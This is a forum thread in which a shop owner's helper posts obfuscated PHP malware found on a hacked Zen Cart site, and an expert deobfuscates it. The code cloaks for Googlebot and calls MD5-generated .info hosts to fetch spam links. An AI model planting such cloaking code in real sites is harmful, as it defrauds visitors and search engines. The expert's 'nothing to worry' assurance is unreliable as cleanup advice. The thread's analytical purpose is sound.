zen cart store php hacked, need help analyzing code

Posted on 2009-12-17
Last Modified: 2012-05-08
hello, I'm helping a client with a hacked store. I found an eval(base64_decode so I decoded it myself, and came up with the resulting code. We discovered the code when google cache indicated that it was presenting unsavory links ONLY to the google search indexer and not to normal browsers. I need help analyzing it to understand what else it does and what else needs to be cleaned.

Any help would be greatly appreciated!
//below is the base64 decoded string

$_439ec1cb0f1656c6617f41d88cf94830 = chr(115).chr(117).chr(98).chr(115).chr(116).chr(114);

$_2938297da3b9a834030705b3aa59d93a = chr(109).chr(100).chr(53);

$_ba30428b6c049208a76657c6480b7ddf = chr(102).chr(115).chr(111).chr(99).chr(107).chr(111).chr(112).chr(101).chr(110);

$_ecaa7596b439b9af60cc983b2067fabc = chr(102).chr(112).chr(117).chr(116).chr(115);

$_91588db553ad4b8cc624d1cf6fadf368 = chr(102).chr(103).chr(101).chr(116).chr(115);

$_1d342bc8a8990aae1ed29b52fd51338c = chr(115).chr(116).chr(114).chr(115).chr(116).chr(114);

$_a320eb60651b291ca479f43a8856b73a = chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82);

$_5a672364743eba1bc07363e4bfced05c = $$_a320eb60651b291ca479f43a8856b73a;

if($_1d342bc8a8990aae1ed29b52fd51338c($_5a672364743eba1bc07363e4bfced05c[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)], chr(71).chr(111).chr(111).chr(103).chr(108).chr(101).chr(98).chr(111).chr(116))) {

 for($_a2efef6c3e0c659266a3612f08e0f219=458567;$_a2efef6c3e0c659266a3612f08e0f219<458575;$_a2efef6c3e0c659266a3612f08e0f219++) {

  $_37aa5f149a6572e7fb03eb18e150c6dc = $_439ec1cb0f1656c6617f41d88cf94830($_2938297da3b9a834030705b3aa59d93a($_a2efef6c3e0c659266a3612f08e0f219), 0, 16) . chr(46).chr(105).chr(110).chr(102).chr(111);

  $_002a8c508b8e2392e60bb9ffeece46c0=$_ba30428b6c049208a76657c6480b7ddf($_37aa5f149a6572e7fb03eb18e150c6dc, chr(56).chr(48));



  $_ecaa7596b439b9af60cc983b2067fabc($_002a8c508b8e2392e60bb9ffeece46c0, chr(71).chr(69).chr(84).chr(32).chr(47).chr(57).chr(100).chr(100).chr(100).chr(102).chr(50).chr(97).chr(52).chr(102).chr(55).chr(100).chr(57).chr(52).chr(53).chr(57).chr(52).chr(101).chr(99).chr(50).chr(101).chr(97).chr(57).chr(56).chr(52).chr(48).chr(55).chr(97).chr(52).chr(49).chr(48).chr(101).chr(49).chr(32).chr(72).chr(84).chr(84).chr(80).chr(47).chr(49).chr(46).chr(49)."\r\n".chr(72).chr(111).chr(115).chr(116).chr(58).chr(32).$_37aa5f149a6572e7fb03eb18e150c6dc."\r\n".chr(82).chr(101).chr(102).chr(101).chr(114).chr(101).chr(114).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47) . $_5a672364743eba1bc07363e4bfced05c[chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(95).chr(78).chr(65).chr(77).chr(69)] . $$_a320eb60651b291ca479f43a8856b73a[chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(95).chr(85).chr(82).chr(73)]."\r\n\r\n");


  while($_f41b8a7eec9e13339d27d6f86193bdc4 = $_91588db553ad4b8cc624d1cf6fadf368($_002a8c508b8e2392e60bb9ffeece46c0, 1024)) {

   if($_fc5c9462e5e78a93bde7df3182d2f1ee) {






   if($_1d342bc8a8990aae1ed29b52fd51338c($_f41b8a7eec9e13339d27d6f86193bdc4,chr(45).chr(45).chr(45).chr(45).chr(45))) {









Open in new window

Question by:MeridianManagement
    LVL 17

    Accepted Solution

    Here is decoded PHP code:

    When it finds user agent is GoogleBot, it tries a lot of MD5ed hosts and .info extension to connect, if it connect successfully, it sends URL, Referrer, etc. to that server.

    Funny one! Have a lot of bugs, like when it sends HTTP/1.1 request it doesn't put \r\n

    Nothing to worry...
    if(strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
     for($i=458567;$i<458575;$i++) {
      $var1 = substr(md5($i), 0, 16).".info";
      $sock=fsockopen($var1, 80);
      fputs($sock, "GET /9dddf2a4f7d94594ec2ea98407a410e1 HTTP/1.1 Host: ".$var1."\r\n"."Referer: http://".$_SERVER[SERVER_NAME].$_SERVER['REQUEST_URI']."\r\n\r\n");
      while($recv = fgets($sock, 1024)) {
       if($var2) {
       if(strstr($recv,'-----')) {

    Open in new window

    LVL 2

    Author Comment

    Thanks for the analysis.

    The line that shows /9dddf2a4f7d94594ec2ea98407a410e1 Is that referring to another file on the server?

    You're saying it's trying a lot of md5hosts but where is it getting the addresses for these hosts? I'm not sure I understand how you can connect to a host whose address is encrypted with md5.

    Do you think there are other areas I need to clean or does this appear to be contained?
    LVL 17

    Expert Comment

    Look, calculate MD5 of a number, like 4558, assume it's a9438938a889a839 etc. This code tries to connect that string and .info, on port 80.

    That /9dddf2a4f7d94594ec2ea98407a410e1 is in hacker's site, yes that file is on that server. As I said, nothing to worry, it's buggy not working code

    Write Comment

    Please enter a first name

    Please enter a last name

    We will never share this with anyone.

    Featured Post

    How your wiki can always stay up-to-date

    Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
    - Increase transparency
    - Onboard new hires faster
    - Access from mobile/offline

    Foreword (July, 2015) Since I first wrote this article, years ago, a great many more people have begun using the internet.  They are coming online from every part of the globe, learning, reading, shopping and spending money at an ever-increasing ra…
    If your site has a few sections that need to be secure when data is transmitted between the server and local computer, such as a /order/ section for ordering or /customer/ which contains customer data, etc it would of course be recommended to secure…
    Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
    The viewer will learn how to dynamically set the form action using jQuery.

    758 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    13 Experts available now in Live!

    Get 1:1 Help Now